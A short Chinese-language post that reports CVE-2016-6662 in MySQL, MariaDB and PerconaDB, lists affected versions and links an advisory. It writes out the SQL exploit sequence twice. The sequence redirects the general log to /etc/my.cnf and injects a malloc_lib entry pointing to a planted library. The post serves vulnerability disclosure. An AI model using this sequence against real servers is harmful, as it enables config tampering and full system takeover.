今早看到了一個影響全系列 MySQL、MariaDB、PerconaDB 的安全性漏洞,漏洞編號是 CVE-2016-6662。這個漏洞能夠讓攻擊者透過特殊的 SQL 指令寫入檔案系統,並且動態注入 library 進而控制整個系統。
攻擊範例如下:
mysql> set global general_log_file = ‘/etc/my.cnf’;
mysql> set global general_log = on;
mysql> select ‘
‘>
‘> ; injected config entry
‘>
‘> [mysqld] ‘> malloc_lib=/tmp/mysql_exploit_lib.so
‘>
‘> [separator] ‘>
‘> ‘;
1 row in set (0.00 sec)
mysql> set global general_log = off;
mysql> set global general_log = on;
mysql> select ‘
‘>
‘> ; injected config entry
‘>
‘> [mysqld] ‘> malloc_lib=/tmp/mysql_exploit_lib.so
‘>
‘> [separator] ‘>
‘> ‘;
1 row in set (0.00 sec)
mysql> set global general_log = off;
透過 SQL 指令寫入 /etc/my.cnf,並且加入 mysql_exploit_lib.so 進而控制系統。受影響的版本包括
MySQL <= 5.7.15
5.6.33
5.5.52
以及 MySQL 的衍生版本 MariaDB 和 PerconaDB。
詳細漏洞資訊可以到這裡查詢
http://seclists.org/oss-sec/2016/q3/481